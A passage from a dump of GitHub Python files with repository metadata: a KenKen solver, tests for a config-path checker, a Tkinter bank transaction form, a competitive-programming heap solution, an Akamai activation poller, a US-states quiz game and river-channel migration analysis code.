assignment[Xi[0]][Xi[1]] * y == target:\n isConsistent = True\n return isConsistent\n\n def multiplyValue(self, value):\n val = 1\n for x in value:\n val = val * x\n return val\n\n def addValue(self, value):\n val = 0\n for x in value:\n val += x\n return val\n\n def isNodeConsistent(self, assignment, Xi):\n if (assignment[Xi[0]][Xi[1]] >= 0 and \n assignment[Xi[0]][Xi[1]] <= self.size):\n return True\n else:\n return False\n\n def isArcConsistent(self, assignment, Xi, Xj):\n if assignment[Xi[0]][Xi[1]] != self.assignment[Xj[0]][Xj[1]]:\n return True\n else:\n return False\n \n \"\"\"\n Select unassigned square with lowest number of values in domain\n \"\"\"\n def selectUnassignedVariable(self):\n min_values = 8\n position = None\n for i in range(self.size):\n for j in range(self.size):\n if self.assignment[i][j] == 0 and len(self.domains[i,j]) < min_values:\n position = (i,j)\n min_values = len(self.domains[i,j])\n return position\n\n def orderDomainValues(self, var):\n return self.domains[var]\n\nif __name__ == \"__main__\":\n size, numConstraints, constraints = read_input()\n solver = KenKenSolver(size)\n solver.createDomains()\n solver.createArcs()\n solver.addConstraints(constraints)\n solver.createAssignment(constraints)\n print(\"\\n\")\n solver.AC3Prep()\n solver.backtrackSearch()\n","repo_name":"mmcnally1/kenken","sub_path":"kenken.py","file_name":"kenken.py","file_ext":"py","file_size_in_byte":13282,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"35078170847","text":"import os\n\nfrom base import ContextTest, CommandContext, listall\nfrom checker.checkers.path import check\nfrom testfixtures import compare\n\nclass TestPath(ContextTest):\n\n context = CommandContext\n\n def test_source_doesnt_exist(self):\n bad_path = os.path.join(self.c.config_folder,'bad')\n compare(\n check(self.c.config_folder,bad_path),\n \"Does not exist:%r\"%bad_path\n )\n\n def test_source_is_made_absolute_at_start(self):\n # CommandContext pretends nothing exists\n compare(\n check(self.c.config_folder,'foo'),\n \"Does not exist:%r\"%os.path.abspath('foo')\n )\n\n def test_make_target_dir(self):\n # make us not-windows\n self.c.r.replace('subprocess.mswindows',False)\n # pretend only our path exists\n path = '/some/deep/path'\n self.c.existing_paths.add(path)\n compare(check(self.c.config_folder,path),'')\n compare(listall(self.c.dir),[\n 'some',\n 'some/deep',\n 'some/deep/path.listing',\n ])\n compare(self.c.called,[\n \"cp -R '/some/deep/path' '<config>/some/deep'\",\n \"LC_COLLATE=\\\"C\\\" ls -laR --time-style=+ '/some/deep/path'\",\n ])\n\n def test_storage_path_already_exists(self):\n # This is the key element of this test:\n self.c.dir.makedir('something')\n \n self.c.r.replace('subprocess.mswindows',False)\n # pretend only our path exists\n path = '/something'\n self.c.existing_paths.add(path)\n\n compare(check(self.c.config_folder, path), '')\n compare(listall(self.c.dir),[\n 'something.listing',\n 'something',\n ])\n compare(self.c.called,[\n \"cp -R '/something' '<config>'\",\n \"LC_COLLATE=\\\"C\\\" ls -laR --time-style=+ '/something'\",\n ])\n\n def test_selinux_entries(self):\n # selinux in the 2.6 kernel introduces a new column\n # in the permissions block, which we ignore for now\n checker_txt = \"path:/some/folder\\n\"\n \n with CommandContext() as c:\n # pretend we're not on windows\n c.r.replace('subprocess.mswindows',False)\n # pretend the paths exist\n c.existing_paths.add('/some/folder')\n # stub out the cp and ls calls\n c.add(\"cp -R '/some/folder' '<config>/some'\",files=(\n ('some/folder/afile.cfg','content'),\n ('some/folder/bfile.cfg','content'),\n ('some/folder/cfile.cfg','content'),\n ))\n c.add(\"LC_COLLATE=\\\"C\\\" ls -laR --time-style=+ '/some/folder'\",\n output=\"\"\"/some/folder:\ntotal 36\ndrwxr-xr-x. 2 root root 4096 .\ndrwxr-xr-x+ 46 root root 4096 ..\n-rw-r--r--. 1 root root 2425 afile.cfg\n-rw-r--r--+ 1 root root 1421 bfile.cfg\n-rw-r--r-- 1 root root 1421 cfile.cfg\n\"\"\")\n # now run the config\n c.run_with_config(checker_txt)\n # check the calls\n compare(c.called,[\n \"cp -R '/some/folder' '<config>/some'\",\n \"LC_COLLATE=\\\"C\\\" ls -laR --time-style=+ '/some/folder'\",\n 'svn up -q <config>',\n 'svn status <config>'\n ])\n # check the files are as expected\n compare([\n 'checker.txt',\n 'some/folder.listing',\n 'some/folder/afile.cfg',\n 'some/folder/bfile.cfg',\n 'some/folder/cfile.cfg',\n ], listall(c.dir,dir=False))\n compare(\"\"\"/some/folder:\ndrwxr-xr-x root root .\n-rw-r--r-- root root afile.cfg\n-rw-r--r-- root root bfile.cfg\n-rw-r--r-- root root cfile.cfg\n\"\"\", c.dir.read(('some', 'folder.listing')))\n","repo_name":"simplistix/checker","sub_path":"checker/tests/test_path.py","file_name":"test_path.py","file_ext":"py","file_size_in_byte":3851,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"3"} +{"seq_id":"23318817097","text":"from tkinter import *\nfrom tkinter import font,messagebox\nfrom proyecto.imagenes.rutas_imagenes import Tool\nfrom proyecto.presentacion.confirmacion_transaccion import FrmConfirmarTransaccion\nfrom proyecto.negocios.Cliente import Cliente\nfrom proyecto.negocios.Cuenta import Cuenta\n\nclass FrmTransaccion(Frame):\n def __init__(self,master=None,titulo=None,accion=None,cliente=None):\n #def crear_ventana(self,master=None,titulo=None,accion=None,datos=None):\n super().__init__(master)\n self.titulo=titulo\n self.master = master\n self.accion=accion\n #self.datos=datos\n self.cliente=cliente\n self.cta_id=0\n #self.resultado=False\n #self.email_registrado=email\n self.numero_cta=StringVar()\n self.saldo_disp = StringVar()\n self.tipo_transaccion=StringVar()\n self.correo_electronico = StringVar()\n self.celular = StringVar()\n self.cedula = StringVar()\n self.lbl_fonts = font.Font(family=\"Calibri\", size=9, weight=\"bold\")\n self.lbl_entrys = font.Font(family=\"Calibri\", size=14, weight=\"bold\")\n self.tools = Tool(self.master)\n\n self.master.title(titulo)\n self.master.iconbitmap(self.tools.imagen_icono)\n self.crear_widgets()\n\n\n def continuar(self):\n if self.accion==\"DEPOSITAR\":\n self.depositar()\n\n if self.accion==\"RETIRAR\":\n messagebox.showinfo(self.titulo,\"En desarrollo.....\")\n\n if self.accion == \"TRANSFERIR\":\n messagebox.showinfo(self.titulo,\"En desarrollo.....\")\n\n\n def depositar(self):\n numero_cta = self.numero_cta.get()\n saldo_disp = self.saldo_disp.get()\n monto = self.txt_monto_transaccion.get()\n\n if not monto:\n messagebox.showwarning(self.titulo, \"Digite el monto a retirar, por favor!!\")\n return False\n\n monto=float(monto)\n saldo = float(saldo_disp) + float(monto)\n\n #verificar la transaccion a traves de la clave temp. enviada al correo registrado\n ventana=Toplevel(self.master)\n app=FrmConfirmarTransaccion()\n resultado=app.crear_ventana(master=ventana,titulo=\"Confirmar Datos\",accion=\"REGISTRAR\",email=self.txt_email.get())\n\n if not resultado:\n messagebox.showwarning(self.titulo,\"No se puede seguir con la transaccion!!\")\n return False\n\n\n cuentas = Cuenta()\n if not cuentas.depositar_by_cta(self.cta_id,numero_cta, monto,saldo):\n messagebox.showwarning(self.titulo, \"Ocurrio un error al momento de realizar la transacción!!\")\n return False\n\n messagebox.showinfo(self.titulo, \"Deposito realizado con éxito!!\")\n if messagebox.askquestion(self.titulo,\"Desean realizar otra transacción: \")==\"no\":\n self.master.destroy()\n\n\n def cancelar(self):\n if messagebox.askquestion(title=self.titulo, message=\"Está seguro de cancelar la transacción Sí / No\") == \"yes\":\n self.master.destroy()\n\n\n def validate_entry(self,text):\n # print(text,\"largo codigo: \",len(self.txt_codigo_temp.get()))\n # if len(self.txt_codigo_temp.get())>3:\n # messagebox.showinfo(\"parar\")\n # text = \"\"\n # return text\n return text.isdecimal()\n\n def crear_widgets(self):\n fila_grid = 1\n\n # ZONA DE IDENTIFICACION\n self.lbl_frm_ident = LabelFrame(self.master, text=\"Identificación\",\n font=self.lbl_fonts,\n width=60, height=100)\n self.lbl_frm_ident.grid(row=fila_grid, column=0, padx=20, pady=5)\n fila_grid += 1\n\n self.lbl1 = Label(self.lbl_frm_ident, text=\"Correo Electrónico\", width=26, anchor=\"w\", bg=\"gray\", fg=\"black\")\n self.lbl1.grid(row=fila_grid, column=1, padx=10, pady=2)\n self.txt_email = Entry(self.lbl_frm_ident, width=62, state=\"disabled\", textvariable=self.correo_electronico)\n self.txt_email.grid(row=fila_grid, column=2, padx=15, pady=2)\n fila_grid += 1\n\n self.lbl2 = Label(self.lbl_frm_ident, text=\"# de Celular\", width=26, anchor=\"w\", bg=\"gray\", fg=\"black\")\n self.lbl2.grid(row=fila_grid, column=1, padx=10, pady=2)\n self.txt_celular = Entry(self.lbl_frm_ident, width=62, state=\"disabled\", textvariable=self.celular)\n self.txt_celular.grid(row=fila_grid, column=2, padx=15, pady=2)\n fila_grid += 1\n\n self.lbl3 = Label(self.lbl_frm_ident, text=\"# de Cédula\", width=26, anchor=\"w\", bg=\"gray\", fg=\"black\")\n self.lbl3.grid(row=fila_grid, column=1, padx=10, pady=2)\n self.txt_cedula = Entry(self.lbl_frm_ident, width=62, state=\"disabled\", textvariable=self.cedula)\n self.txt_cedula.grid(row=fila_grid, column=2, padx=15, pady=1)\n fila_grid += 1\n\n #\n self.labelframe = LabelFrame(self.master, text=\"Transacción\",\n font=self.lbl_fonts,\n width=60, height=100)\n self.labelframe.grid(row=fila_grid, column=0, padx=20, pady=10)\n fila_grid += 1\n\n self.lbl3_1 = Label(self.labelframe, text=\"Número de Cuenta:\", width=26, anchor=\"w\", bg=\"gray\", fg=\"black\")\n self.lbl3_1.grid(row=fila_grid, column=1, padx=10, pady=2)\n self.txt_numero_cta = Entry(self.labelframe, width=37, font=self.lbl_entrys, state=\"readonly\",\n textvariable=self.numero_cta)\n self.txt_numero_cta.grid(row=fila_grid, column=2, columnspan=2, padx=15, pady=2, ipady=2)\n fila_grid += 1\n\n self.lbl4 = Label(self.labelframe, text=\"Saldo Disponible\", width=26, anchor=\"w\", bg=\"gray\", fg=\"black\")\n self.lbl4.grid(row=fila_grid, column=1, padx=10, pady=2)\n self.txt_saldo_disp = Entry(self.labelframe, width=37,font=self.lbl_entrys,state=\"readonly\",textvariable=self.saldo_disp)\n self.txt_saldo_disp.grid(row=fila_grid, column=2,columnspan=2, padx=15, pady=2,ipady=2)\n fila_grid += 1\n\n\n\n self.transaccion=\"\"\n if self.accion==\"DEPOSITAR\":\n self.transaccion=\"Deposito en Cuenta Bancaria\"\n self.mensaje_tipo_transaccion=\"Monto a Depositar\"\n if self.accion==\"RETIRAR\":\n self.transaccion=\"Retiro de Cuenta Bancaria\"\n self.mensaje_tipo_transaccion = \"Monto a Retirar\"\n if self.accion==\"TRANSFERIR\":\n self.transaccion=\"Transferencia de Cuentas Bancarias\"\n self.mensaje_tipo_transaccion = \"Monto a Transaferir\"\n self.lbl5 = Label(self.labelframe, text=\"Tipo de Transacción: \", width=26, anchor=\"w\", bg=\"gray\", fg=\"black\")\n self.lbl5.grid(row=fila_grid, column=1, padx=10, pady=2)\n self.txt_transaccion = Entry(self.labelframe, width=62, state=\"disabled\", textvariable=self.tipo_transaccion)\n self.txt_transaccion.grid(row=fila_grid, column=2, padx=15, pady=1)\n self.tipo_transaccion.set(self.transaccion)\n fila_grid += 1\n\n self.lbl6 = Label(self.labelframe, text=self.mensaje_tipo_transaccion, width=26, anchor=\"w\", bg=\"gray\", fg=\"black\")\n self.lbl6.grid(row=fila_grid, column=1, padx=10, pady=2)\n self.txt_monto_transaccion = Entry(self.labelframe, width=62, state=\"normal\")\n self.txt_monto_transaccion.grid(row=fila_grid, column=2, padx=15, pady=1)\n fila_grid += 1\n\n if self.accion == \"TRANSFERIR\":\n self.lbl7 = Label(self.labelframe, text=\"Cuenta a Transferir\", width=26, anchor=\"w\", bg=\"gray\",\n fg=\"black\")\n self.lbl7.grid(row=fila_grid, column=1, padx=10, pady=2)\n self.txt_cta_transferir = Entry(self.labelframe, width=62, state=\"normal\")\n self.txt_cta_transferir.grid(row=fila_grid, column=2, padx=15, pady=1)\n fila_grid += 1\n\n # zona de botones\n self.frame_botones = LabelFrame(self.master, text=\"Acciones\",\n font=self.lbl_fonts,\n width=200, height=100)\n self.frame_botones.grid(row=fila_grid, column=0, padx=20, pady=10)\n fila_grid += 1\n\n self.boton_Continuar = Button(self.frame_botones, text=\"Continuar\", width=60, height=38,\n image=self.tools.imagen_avanzar, compound=TOP,\n command=self.continuar)\n self.boton_Continuar.grid(row=fila_grid, column=2, padx=3, pady=2)\n\n self.boton_cancelar = Button(self.frame_botones, text=\"Cancelar\", width=60, height=38,\n image=self.tools.imagen_descartar, compound=TOP,\n command=self.cancelar)\n self.boton_cancelar.grid(row=fila_grid, column=3, padx=3, pady=2)\n\n clientes=Cliente()\n cuentas=Cuenta()\n lista_cta=cuentas.consulta_saldo_disponible_by_cli(self.cliente)\n lista_datos_reg = clientes.consulta_datos_registro_by_cli(self.cliente)\n\n self.cta_id=lista_cta[0]\n self.numero_cta.set(lista_cta[1])\n self.saldo_disp.set(lista_cta[2])\n\n self.correo_electronico.set(lista_datos_reg[0])\n self.celular.set(lista_datos_reg[1])\n self.cedula.set(lista_datos_reg[2])\n","repo_name":"AdonisAMG/Istg","sub_path":"2G/cuentas_bancarias2/proyecto/presentacion/transacciones.py","file_name":"transacciones.py","file_ext":"py","file_size_in_byte":9242,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"18332740781","text":"import sys\nimport math\nimport bisect\nfrom heapq import heapify, heappop, heappush\nfrom collections import deque, defaultdict, Counter\nfrom functools import lru_cache\nfrom itertools import accumulate, combinations, permutations\n\nsys.setrecursionlimit(1000000)\nMOD = 10 ** 9 + 7\nMOD99 = 998244353\n\ninput = lambda: sys.stdin.readline().strip()\nNI = lambda: int(input())\nNMI = lambda: map(int, input().split())\nNLI = lambda: list(NMI())\nSI = lambda: input()\nSMI = lambda: input().split()\nSLI = lambda: list(SMI())\n\n\n# 削除可能heapq\nfrom heapq import *\nclass Heapq:\n '''\n Heapq() : 本体qと削除用pの2本のheapqを用意する\n build(a) : 配列aからプライオリティキューqを構築する\n push(x) : プライオリティキューにxを追加\n erase(x) : プライオリティーキューからxを(疑似的に)削除\n clean() : 削除予定でトップに来た要素をq,pからpop\n pop((exc)) : トップの要素をqからpop (qが空の場合、excを返す)\n top((exc)) : トップの要素の値を取得 (qが空の場合、excを返す)\n '''\n def __init__(self):\n self.q = []\n self.p = []\n def build(self, a):\n self.q = a\n heapify(self.q)\n def push(self, x):\n heappush(self.q, x)\n def erase(self, x):\n heappush(self.p, x)\n self.clean()\n def clean(self):\n while self.p and self.q and self.q[0]==self.p[0]:\n heappop(self.q)\n heappop(self.p)\n def pop(self, exc=None):\n self.clean()\n if self.q:\n return heappop(self.q)\n return exc\n def top(self, exc=None):\n self.clean()\n if self.q:\n return self.q[0]\n return exc\n\n\ndef main():\n N = NI()\n T = []\n\n hq1 = Heapq()\n hq2 = Heapq()\n T1 = [0] * N\n T2 = [0] * N\n\n for i in range(N):\n k, *t = NMI()\n t = deque(t)\n if len(t) > 0:\n x = t.popleft() * (-1)\n hq1.push((x, i))\n T1[i] = x\n if len(t) > 0:\n x = t.popleft() * (-1)\n hq2.push((x, i))\n T2[i] = x\n T.append(t)\n\n M = NI()\n A = NLI()\n\n # print(hq1.q)\n # print(hq2.q)\n\n for a in A:\n if a == 1:\n x, i = hq1.pop(exc=(0, 0))\n t = T2[i]\n hq2.erase((t, i))\n hq1.push((t, i))\n T1[i] = T2[i]\n if len(T[i]) > 0:\n t = T[i].popleft()\n T2[i] = t * (-1)\n hq2.push((t * (-1), i))\n else:\n T2[i] = 0\n print(-x)\n\n\n else:\n x1, i1 = hq1.pop(exc=(0, 0))\n x2, i2 = hq2.pop(exc=(0, 0))\n\n if x1 < x2:\n # x1を採用\n x, i = x1, i1\n hq2.push((x2, i2))\n t = T2[i]\n hq2.erase((t, i))\n hq1.push((t, i))\n T1[i] = T2[i]\n if len(T[i]) > 0:\n t = T[i].popleft()\n T2[i] = t * (-1)\n hq2.push((t * (-1), i))\n else:\n T2[i] = 0\n print(-x)\n\n else:\n x, i = x2, i2\n hq1.push((x1, i1))\n\n if len(T[i]) > 0:\n t = T[i].popleft()\n # print(x, i, -t)\n T2[i] = t * (-1)\n hq2.push((t*(-1), i))\n else:\n T2[i] = 0\n print(-x)\n\n # print(T1)\n # print(T2)\n # print(hq1.q)\n # print(hq2.q)\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"Mao-beta/AtCoder","sub_path":"PAST/PAST03L.py","file_name":"PAST03L.py","file_ext":"py","file_size_in_byte":3651,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"4023952737","text":"# Load in data for steady state simulations and save average of years 11-15 in climatology folder. \n\nimport numpy as np\nimport xarray as xr\nimport matplotlib.pyplot as plt\nfrom physics import get_edge_psi\n\nintdown=True\n\nvars_90 = get_edge_psi('ss_90.000', thresh=0., intdown=intdown)\nvars_95 = get_edge_psi('ss_95.000', thresh=0., intdown=intdown)\nvars_100 = get_edge_psi('ss_100.000', thresh=0., intdown=intdown)\nvars_105 = get_edge_psi('ss_105.000', thresh=0., intdown=intdown)\nvars_110 = get_edge_psi('ss_110.000', thresh=0., intdown=intdown)\nvars_115 = get_edge_psi('ss_115.000', thresh=0., intdown=intdown)\n\nplt.plot(vars_90[0], vars_90[1], 'xk', mew=2)\nplt.plot(vars_95[0], vars_95[1], 'xk', mew=2)\nplt.plot(vars_100[0], vars_100[1], 'xk', mew=2)\nplt.plot(vars_105[0], vars_105[1], 'xk', mew=2)\nplt.plot(vars_110[0], vars_110[1], 'xk', mew=2)\nplt.plot(vars_115[0], vars_115[1], 'xk', mew=2)\nplt.show()","repo_name":"subond/python_scripts","sub_path":"steady_state_runs/regime_fig_ss.py","file_name":"regime_fig_ss.py","file_ext":"py","file_size_in_byte":907,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"3"} +{"seq_id":"21613505045","text":"from __future__ import annotations\n\nimport json\nimport time\nfrom time import gmtime\nfrom time import strftime\n\nfrom exceptions import setup_logger\nfrom rich.live import Live\nfrom rich.table import Table\n\nlogger = setup_logger()\n\n\ndef generate_table(activationDict, network) -> Table:\n\n \"\"\"Make a new table.\"\"\"\n table = Table()\n table.add_column('Property Name')\n table.add_column('Property Id')\n table.add_column('Activation Id')\n table.add_column('Status')\n\n for propertyStatus in activationDict:\n try:\n activation_status = propertyStatus['activationStatus'][network]\n except:\n activation_status = '....Checking Status....'\n table.add_row(\n f\"{propertyStatus['propertyName']}\", f\"{propertyStatus['propertyId']}\", f\"{propertyStatus['activationId']}\", f'[red]{activation_status}' if activation_status != 'ACTIVE' else '[green]ACTIVE'\n )\n return table\n\n\ndef pollActivation(activationDict, wrapper_object, contract_id, group_id, network):\n start_time = time.perf_counter()\n all_properties_active = False\n elapse_time = 0\n with Live(generate_table(activationDict, network), refresh_per_second=1) as live:\n while (not all_properties_active):\n end_time = time.perf_counter()\n elapse_time = (end_time - start_time)\n for i, propertyActivation in enumerate(activationDict):\n activation_id = propertyActivation['activationId']\n property_id = propertyActivation['propertyId']\n property_name = propertyActivation['propertyName']\n activationStatus = {'STAGING': '',\n 'PRODUCTION': ''}\n if activation_id != 0:\n activation_status_response = wrapper_object.pollActivationStatus(contract_id,\n group_id,\n property_id,\n activation_id)\n if activation_status_response.status_code == 200:\n for each_activation in activation_status_response.json()['activations']['items']:\n if each_activation['activationId'] == activation_id:\n if network in each_activation['network']:\n if each_activation['status'] != 'ACTIVE':\n activationStatus[network] = 'PENDING_ACTIVATION'\n all_properties_active = False\n elif each_activation['status'] == 'ACTIVE':\n end_time = time.perf_counter()\n elapse_time = str(strftime('%H:%M:%S', gmtime(end_time - start_time)))\n # msg = f'Successfully activated property {property_name} v1 on Akamai {network} network'\n # logger.info(f'Activation Duration: {elapse_time} {msg}')\n activationStatus[network] = 'ACTIVE'\n else:\n logger.error('Unable to parse activation status')\n activationStatus[network] = 'UNABLE_TO_UPDATE_STATUS'\n all_properties_active = False\n else:\n logger.error(json.dumps(activation_status_response.json(), indent=4))\n logger.error(f'Unable to get activation status for {property_name}')\n activationStatus[network] = 'UNABLE_TO_UPDATE_STATUS'\n all_properties_active = False\n\n else:\n activationStatus[network] = 'ACTIVATION_ERROR'\n\n # check to see if all are active, if so - set variable to true\n activationDict[i]['activationStatus'] = activationStatus\n pending_activations = (list(filter(lambda x: x['activationStatus'][network] not in ['ACTIVE', 'ACTIVATION_ERROR'], activationDict)))\n live.update(generate_table(activationDict, network))\n if len(pending_activations) == 0:\n all_properties_active = True\n break\n logger.info('Polling 30s...')\n time.sleep(30)\n return (all_properties_active, activationDict)\n","repo_name":"akamai/cli-onboard","sub_path":"bin/poll.py","file_name":"poll.py","file_ext":"py","file_size_in_byte":4594,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"3"} +{"seq_id":"18639917171","text":"from turtle import Screen,Turtle\nimport pandas\ndef find_state(user_answer):\n\n result = states_df[states_df[\"state\"] == str(user_answer).title()]\n if not result.empty:\n return result\n else:\n return \"\"\n\ndef write_name_on_window(found_state):\n state_writer.goto(x=float(found_state[\"x\"]), y=float(found_state[\"y\"]))\n state_writer.write(arg=result[\"state\"].values[0], move=True, align=\"center\")\ndef create_new_file_and_delete_exist_info():\n\n with open(\"answered_state.txt\",\"w\") as answered_state:\n answered_state.write(\"\")\ncreate_new_file_and_delete_exist_info()\nscreen = Screen()\nmap = Turtle()\nstate_writer = Turtle()\nscreen.addshape(\"blank_states_img.gif\")\nmap.shape(\"blank_states_img.gif\")\n\nstates_df = pandas.read_csv(\"50_states.csv\")\nnumber_state = 0\nanswered_state = []\nwhile(number_state<=55):\n user_answer = screen.textinput(\"state_name\",\"What's another state name?\")\n if user_answer == \"exit\":\n break\n result = find_state(user_answer)\n if(str(result)!=\"\"):\n if(user_answer.title() not in answered_state):\n answered_state.append(user_answer.title())\n write_name_on_window(result)\n\nprint(f\"You have answered {len(answered_state)} out of 55 states\")\nwith open(\"answered_state.txt\",mode=\"w\") as file:\n for state in answered_state:\n file.write(f\"{state}\\n\")\n\n","repo_name":"supawichza40/100DaysCoding-Python","sub_path":"day_25/us-states-game-start/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1361,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"20451174961","text":"import numpy as np\nimport matplotlib.pyplot as plt\nimport matplotlib as mpl\nfrom mpl_toolkits.axes_grid1 import make_axes_locatable\nfrom scipy.signal import medfilt, savgol_filter\nimport scipy.interpolate\nfrom scipy.spatial import distance\nfrom librosa.sequence import dtw # only need the 'dtw' function from the librosa library\nimport pandas as pd\nimport shapefile\nfrom shapely.geometry.polygon import LinearRing, orient\nfrom shapely.geometry import Polygon, MultiPolygon, Point, MultiLineString, LineString\nfrom shapely.ops import snap, polygonize, unary_union\nfrom descartes import PolygonPatch\nfrom tqdm.notebook import tqdm, trange\nimport itertools\nimport datetime\n\ndef resample_and_smooth(x,y,delta_s,smoothing_factor):\n dx = np.diff(x); dy = np.diff(y) \n ds = np.sqrt(dx**2+dy**2)\n tck, u = scipy.interpolate.splprep([x,y],s=smoothing_factor) # parametric spline representation of curve\n unew = np.linspace(0,1,1+int(sum(ds)/delta_s)) # vector for resampling\n out = scipy.interpolate.splev(unew,tck) # resampling\n xs = out[0]\n ys = out[1]\n return xs, ys\n\ndef correlate_curves(x1, x2, y1, y2):\n # use dynamic time warping to correlate two 2D curves\n X = np.vstack((x1,y1))\n Y = np.vstack((x2,y2))\n sm = distance.cdist(X.T, Y.T) # similarity matrix\n D, wp = dtw(C=sm) # dynamic time warping\n p = wp[:,0] # correlation indices for first curve\n q = wp[:,1] # correlation indices for second curve\n return p,q,sm\n\ndef compute_curvature(x,y):\n dx = np.gradient(x); dy = np.gradient(y) \n ds = np.sqrt(dx**2+dy**2)\n ddx = np.gradient(dx); ddy = np.gradient(dy) # second derivatives \n curvature = (dx*ddy - dy*ddx) / ((dx**2 + dy**2)**1.5)\n s = np.cumsum(ds)\n return curvature, s\n\ndef convert_string_to_date(string):\n year = int(string[:4])\n month = int(string[4:6])\n day = int(string[6:])\n date = datetime.datetime(year, month, day)\n return date\n\ndef get_migr_rate(x1, x2, y1, y2, years):\n p, q, sm = correlate_curves(x1, x2, y1, y2)\n p = p[::-1] # p and q need to be flipped!\n q = q[::-1]\n qn = np.delete(np.array(q),np.where(np.diff(p)==0)[0]+1)\n pn = np.delete(np.array(p),np.where(np.diff(p)==0)[0]+1)\n xa = x1[:-1]\n xb = x1[1:]\n ya = y1[:-1]\n yb = y1[1:]\n x = x2[qn][1:]\n y = y2[qn][1:]\n migr_sign = np.sign((x-xa) * (yb-ya) - (y-ya) * (xb-xa))\n migr_sign = np.hstack((migr_sign[0], migr_sign))\n migr_dist = migr_sign * sm[pn, qn] / years\n return migr_dist, migr_sign, p, q\n\ndef find_zero_crossings(curve, s, x, y):\n n_curv = abs(np.diff(np.sign(curve)))\n n_curv[n_curv==2] = 1\n loc_zero_curv = np.where(n_curv)[0]\n loc_zero_curv = loc_zero_curv +1\n if loc_zero_curv[-1] != len(s)-1:\n loc_zero_curv = np.hstack((0,loc_zero_curv,len(s)-1))\n else:\n loc_zero_curv = np.hstack((0,loc_zero_curv))\n n_infl = len(loc_zero_curv)\n max_curv = np.zeros(n_infl-1)\n loc_max_curv = np.zeros(n_infl-1, dtype=int)\n for i in range(1, n_infl):\n if np.mean(curve[loc_zero_curv[i-1]:loc_zero_curv[i]])>0:\n max_curv[i-1] = np.max(curve[loc_zero_curv[i-1]:loc_zero_curv[i]])\n if np.mean(curve[loc_zero_curv[i-1]:loc_zero_curv[i]])<0:\n max_curv[i-1] = np.min(curve[loc_zero_curv[i-1]:loc_zero_curv[i]])\n max_local_ind = np.where(curve[loc_zero_curv[i-1]:loc_zero_curv[i]]==max_curv[i-1])[0]\n if len(max_local_ind)>1:\n loc_max_curv[i-1] = loc_zero_curv[i-1] + max_local_ind[0]\n elif len(max_local_ind)==1:\n loc_max_curv[i-1] = loc_zero_curv[i-1] + max_local_ind\n else:\n loc_max_curv[i-1] = 0\n # find interpolated zero crossing locations:\n zero_crossings = []\n for i in loc_zero_curv[1:-1]:\n x1 = s[i-1]\n x2 = s[i]\n y1 = curve[i-1]\n y2 = curve[i]\n a = (y2 - y1) / (x2 - x1)\n b = (y1*x2 - y2*x1) / (x2 - x1)\n zero_crossings.append(-b/a)\n zero_x = []\n zero_y = []\n count = 0\n for i in loc_zero_curv[1:-1]:\n x1 = x[i]\n y1 = y[i]\n x2 = x[i+1]\n y2 = y[i+1]\n s1 = s[i]\n s2 = s[i+1]\n s0 = zero_crossings[count]\n x0 = x1 + (x2 - x1)*(s0 - s1)/(s2 - s1)\n y0 = y1 + (y2 - y1)*(s0 - s1)/(s2 - s1)\n zero_x.append(x0)\n zero_y.append(y0)\n count += 1\n return loc_zero_curv, loc_max_curv, zero_crossings, zero_x, zero_y\n\ndef create_bars(dates, cutoff_area, dirname, ax):\n # function for creating polygons for 'scroll' bars and plotting them\n bars = [] # these are 'scroll' bars - shapely MultiPolygon objects that correspond to one time step\n erosions = []\n chs = [] # list of channels - shapely Polygon objects\n jumps = [] # gaps between channel polygons that are not cutoffs\n all_chs = [] # list of merged channels (to be used for erosion)\n cutoffs = []\n cmap = mpl.cm.get_cmap('viridis')\n print('create channels and cutoffs...')\n for i in trange(len(dates)-1):\n ch1 = create_channel_polygon_from_shapefile(dirname,dates[i])\n ch2 = create_channel_polygon_from_shapefile(dirname,dates[i+1])\n ch1, bar, erosion, jump, cutoff = one_step_difference_no_plot(ch1,ch2,cutoff_area)\n chs.append(ch1)\n erosions.append(erosion)\n jumps.append(jump)\n cutoffs.append(cutoff)\n chs.append(ch2) # append last channel\n print('create list of merged channels...')\n for i in trange(len(dates)-1): # create list of merged channels\n if i == 0: \n all_ch = chs[len(dates)-1]\n else:\n all_ch = all_ch.union(chs[len(dates)-i-1])\n all_chs.append(all_ch)\n print('create bars...')\n for i in trange(len(dates)-1): # create scroll bars\n bar = chs[i].difference(all_chs[len(dates)-i-2]) # scroll bar defined by difference\n bars.append(bar)\n color = cmap(i/float(len(dates)-1))\n for b in bar: # plotting\n if MultiPolygon(cutoffs[i]).is_valid: # sometimes this is invalid\n if not b.intersects(MultiPolygon(cutoffs[i])):\n ax.add_patch(PolygonPatch(b,facecolor=color,edgecolor='k'))\n else:\n ax.add_patch(PolygonPatch(b,facecolor=color,edgecolor='k'))\n return bars, erosions, chs, all_chs, jumps, cutoffs\n\ndef create_channel_polygon_from_shapefile(dirname, date):\n # function for reading channel bank shapefiles and creating a polygon\n filename1 = dirname+'/lb_'+date[:4]\n filename2 = dirname+'/rb_'+date[:4]\n sf1 = shapefile.Reader(filename1).shapes()\n lb1 = np.array(sf1[0].points)\n sf2 = shapefile.Reader(filename2).shapes()\n rb1 = np.array(sf2[0].points)\n coords = []\n xm = np.hstack((lb1[:,0],rb1[::-1,0]))\n ym = np.hstack((lb1[:,1],rb1[::-1,1]))\n for i in range(len(xm)):\n coords.append((xm[i],ym[i]))\n ch = Polygon(LinearRing(coords))\n if not ch.is_valid:\n ch = ch.buffer(0)\n return ch\n\ndef create_channel_polygon(lbx,lby,rbx,rby):\n # function for creating a channel polygon\n coords = []\n xm = np.hstack((lbx,rbx[::-1]))\n ym = np.hstack((lby,rby[::-1]))\n for i in range(len(xm)):\n coords.append((xm[i],ym[i]))\n ch = Polygon(LinearRing(coords))\n return ch\n\ndef one_step_difference_no_plot(ch1, ch2, cutoff_area):\n both_channels = ch1.union(ch2) # union of the two channels\n outline = Polygon(LinearRing(list(both_channels.exterior.coords))) # outline of the 